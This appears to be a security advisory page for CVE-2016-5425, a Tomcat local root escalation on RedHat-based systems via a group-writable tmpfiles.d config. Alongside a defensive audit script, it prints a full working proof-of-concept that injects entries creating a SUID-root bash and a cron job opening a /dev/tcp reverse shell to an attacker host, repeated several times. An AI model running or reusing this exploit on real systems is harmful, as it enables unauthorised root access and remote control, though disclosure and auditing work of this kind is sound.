7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
7.2 High
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:L/Au:N/C:C/I:C/A:C
0.001 Low
EPSS
Percentile
47.4%
Description
Tomcat has been making headlines lately; barely a month goes by without a new Tomcat vulnerability. On October 11, 2016 a local privilege escalation in Tomcat was published as CVE-2016-5425. It mainly affects the Apache Tomcat packages shipped by RedHat-based distributions, including CentOS, RedHat, Oracle Linux and Fedora. The root cause is that the ordinary tomcat user has write access to the configuration file /usr/lib/tmpfiles.d/tomcat.conf, so a member of the tomcat group, or a WebShell running with the normal tomcat user's privileges, can escalate to root.
Vulnerability description
On RedHat-based distributions, installing the Tomcat package leaves the tomcat.conf file writable by the tomcat group:
[root@localhost ~]# ls -al /usr/lib/tmpfiles.d/tomcat.conf
-rw-rw-r--. 1 root tomcat 43 May 12 2015 /usr/lib/tmpfiles.d/tomcat.conf
The tmpfiles.d directory holds the configuration files that systemd-tmpfiles uses to manage temporary files. An attacker can easily inject a malicious payload into tomcat.conf, for example an entry that spawns a reverse shell or one that creates a file with the SUID bit set. When /usr/bin/systemd-tmpfiles runs, the injected entries are executed.
On RedHat distributions, systemd-tmpfiles is run at boot by the systemd-tmpfiles-setup.service unit:
[root@localhost www]# cat /usr/lib/systemd/system/systemd-tmpfiles-setup.service | grep ExecStart
ExecStart=/usr/bin/systemd-tmpfiles --create --remove --boot --exclude-prefix=/dev
Depending on the system, systemd-tmpfiles may also be triggered by other services, cron jobs, startup scripts and other means. Another point worth noting is that systemd-tmpfiles does not stop processing a configuration file when it hits a syntax error, so an attacker can append a malicious payload to /usr/lib/tmpfiles.d/tomcat.conf without worrying about breaking the rest of the file.
The lines that the PoC below injects into tomcat.conf spawn a reverse shell and create a SUID-root copy of bash. The meaning of the line types C, z and F is documented in man 5 tmpfiles.d: C copies the file given in the last field to the path, z adjusts the mode and ownership of an existing file, and F creates (or truncates) a file with the given mode and ownership and writes the argument as its content.
C /usr/share/tomcat/rootsh 4770 root root - /bin/bash
z /usr/share/tomcat/rootsh 4770 root root -
F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >& /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0>&1 & \n\n"
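Added example (not part of the original advisory or of Dawid Golunski's PoC): a POSIX shell audit that checks for the two conditions this write-up describes, a tmpfiles.d configuration file that a non-root group or everyone can write, and entries that would create a setuid/setgid binary or a cron job once root runs systemd-tmpfiles --create. The sample tomcat.conf it builds is constructed test data modelled on the injected lines above; the benign first line, the 10.0.0.1:9090 placeholder, the function names and the use of GNU stat -c and awk are assumptions.

```sh
#!/bin/sh
# tmpfiles_audit.sh - added audit helper, not code from the advisory or the PoC.
# Requires GNU coreutils (stat -c) and a POSIX awk.

# Return 0 if the file's mode grants write access to group or other,
# i.e. the packaging defect that made CVE-2016-5425 exploitable.
tmpfiles_conf_writable() {
    mode=$(stat -c '%a' "$1") || return 2
    perm=$(printf '%s' "$mode" | tail -c 3)   # drop setuid/setgid/sticky prefix digit
    g=$(printf '%s' "$perm" | cut -c2)        # group permission digit
    o=$(printf '%s' "$perm" | cut -c3)        # other permission digit
    [ $((g & 2)) -ne 0 ] || [ $((o & 2)) -ne 0 ]
}

# Print entries that are dangerous when systemd-tmpfiles applies them as root:
#  - a 4-digit mode whose leading digit has the setuid (4) or setgid (2) bit
#  - any entry whose target path lies under /etc/cron*
# Return 0 if at least one such entry was found, 1 otherwise.
tmpfiles_conf_suspicious() {
    awk '
        /^[[:space:]]*(#|$)/ { next }              # comments and blank lines
        {
            path = $2; mode = $3; bad = 0
            if (mode ~ /^[2-7][0-7][0-7][0-7]$/) bad = 1
            if (path ~ /^\/etc\/cron/) bad = 1
            if (bad) { found = 1; print FILENAME ": " $0 }
        }
        END { if (found) exit 0; exit 1 }
    ' "$1"
}

# Audit every *.conf in a directory; return 0 if anything was flagged.
audit_tmpfiles_dir() {
    rc=1
    for f in "$1"/*.conf; do
        [ -f "$f" ] || continue
        if tmpfiles_conf_writable "$f"; then
            echo "WRITABLE by group/other: $f ($(stat -c '%U:%G %a' "$f"))"
            rc=0
        fi
        tmpfiles_conf_suspicious "$f" && rc=0
    done
    return $rc
}

# Constructed sample (test data written here, not taken from a real host):
# a group-writable tomcat.conf with the PoC's three lines appended.
make_sample_conf() {
    dir=$(mktemp -d)
    f="$dir/tomcat.conf"
    cat > "$f" <<'EOF'
d /run/tomcat 0755 tomcat tomcat -
C /usr/share/tomcat/rootsh 4770 root root - /bin/bash
z /usr/share/tomcat/rootsh 4770 root root -
F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >& /dev/tcp/10.0.0.1/9090 0>&1 & \n\n"
EOF
    chmod 664 "$f"      # mirrors the -rw-rw-r-- root:tomcat mode from the advisory
    printf '%s\n' "$f"
}

# Usage on a real host: sh tmpfiles_audit.sh /usr/lib/tmpfiles.d /etc/tmpfiles.d
if [ $# -gt 0 ]; then
    status=1
    for d in "$@"; do audit_tmpfiles_dir "$d" && status=0; done
    exit $status
fi
```

Run it against /usr/lib/tmpfiles.d and /etc/tmpfiles.d: a non-zero exit with no output means nothing was flagged, while a group- or world-writable file, or an entry granting a setuid mode or writing into /etc/cron.d, is printed and the script exits 0. The mode check treats any 4-digit mode with a setuid or setgid bit as suspicious, so legitimate entries of that kind need review rather than automatic alarm.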
POC
-----------[ tomcat-RH-root.sh ]---------
#!/bin/bash
ATTACKER_IP=127.0.0.1
ATTACKER_PORT=9090
echo -e "\n* Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2016-5425 *"
echo -e "  Discovered by Dawid Golunski\n"
echo "[+] Checking vulnerability"
# The file is vulnerable when it is owned by (and writable for) the tomcat group
ls -l /usr/lib/tmpfiles.d/tomcat.conf | grep "tomcat"
if [ $? -ne 0 ]; then
echo "Not vulnerable or the tomcat installed under a different user than 'tomcat'"
exit 1
fi
echo -e "\n[+] Your system is vulnerable!"
echo -e "\n[+] Appending data to the /usr/lib/tmpfiles.d/tomcat.conf..."
# Append (not overwrite) the payload entries; the existing lines are left intact
cat >> /usr/lib/tmpfiles.d/tomcat.conf <<eof
C /usr/share/tomcat/rootsh 4770 root root - /bin/bash
z /usr/share/tomcat/rootsh 4770 root root -
F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >& /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0>&1 & \n\n"
eof
echo "[+] /usr/lib/tmpfiles.d/tomcat.conf contains:"
cat /usr/lib/tmpfiles.d/tomcat.conf
echo -e "\n[+] Payload injected! Wait for your root shell...\n"
echo -e "Once '/usr/bin/systemd-tmpfiles --create' gets executed (on reboot by tmpfiles-setup.service, by cron, by another service etc.),
the rootshell will be created in /usr/share/tomcat/rootsh.
Additionally, a reverse shell should get executed by crond shortly after and connect to $ATTACKER_IP:$ATTACKER_PORT \n"
--------------[ eof ]--------------------
Local test: